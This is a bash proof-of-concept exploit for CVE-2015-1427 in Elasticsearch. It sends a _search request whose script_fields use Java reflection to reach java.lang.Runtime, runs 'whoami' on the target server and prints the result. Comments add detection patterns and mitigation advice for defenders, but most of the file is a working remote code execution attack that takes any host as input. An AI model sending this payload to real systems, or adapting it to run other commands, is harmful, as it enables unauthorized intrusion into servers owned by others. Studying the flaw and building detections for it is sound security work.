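#!/usr/bin/env bash
# CVE-2015-1427 exploit by t0kx
# https://github.com/t0kx/exploit-CVE-2015-1427
#
# Usage: <this script> HOST
#   HOST is interpolated into http://HOST/_search, so pass the host[:port]
#   of the Elasticsearch HTTP API.
#
# What the script does: it sends one _search request whose "script_fields"
# entry uses Java reflection (Math.class.forName -> java.lang.Runtime) to run
# `whoami` on the server and prints the returned text. A non-empty result
# means the node evaluated the script outside the scripting sandbox.
#
# Defender notes:
#   - Detection: POST bodies to /_search that carry "script_fields" together
#     with "java.lang.Runtime" or ".forName(" are the request shape used
#     here; look for them in reverse-proxy, WAF or packet-capture data.
#   - Mitigation: upgrade to an Elasticsearch release that fixes
#     CVE-2015-1427, or disable dynamic Groovy scripting
#     (script.groovy.sandbox.enabled: false), and keep the HTTP API off
#     untrusted networks.

#######################################
# Send the test request and print the command output returned by the server.
# Globals:   HOST (read, used when no argument is given)
# Arguments: $1 - host[:port] of the Elasticsearch HTTP API (optional)
# Outputs:   progress lines on stdout; diagnostics on stderr
# Returns:   0 if the response contained script output, 1 otherwise
#######################################
exploit() {
  local host=${1:-${HOST:-}}
  local payload

  printf "[+] Exploiting %s\n" "${host}"
  printf "[+] Trigger Payload...\n"

  # The grep/awk/sed chain pulls the value of the "myscript" field out of the
  # pretty-printed JSON response and strips the trailing newline marker.
  payload=$(curl -s "http://${host}/_search?pretty" \
    -XPOST -d '{
    "script_fields": {
        "myscript": {
            "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()"
        }
    }
}' | grep "myscript" \
    | awk -F '\\[ "' '{print $2}' \
    | sed 's/\\n" ]//g')

  # An empty result covers an unreachable endpoint, a patched node and a node
  # with dynamic scripting disabled; none of them returned script output.
  if [[ -z "${payload}" ]]; then
    printf "[-] No script output in the response\n" >&2
    return 1
  fi

  # Quoted so the format string is applied once, whatever the output contains.
  printf "[+] Running whoami: %s\n" "${payload}"
  printf "[+] Done\n"
}

#######################################
# Entry point: validate the argument and run the check.
# Globals:   HOST (written)
# Arguments: $1 - host[:port] of the Elasticsearch HTTP API
# Returns:   exits 1 when no host is given
#######################################
main() {
  printf "[+] CVE-2015-1427 exploit by t0kx\n"
  if [[ -z "${1:-}" ]]; then
    # printf instead of echo: echo would print the "\n" literally.
    printf "[-] Please inform an host as parameter\n" >&2
    # Exit statuses are 0-255; the original "exit -1" is not a portable value.
    exit 1
  fi
  HOST=${1}
  exploit "${HOST}"
}

main "${1:-}"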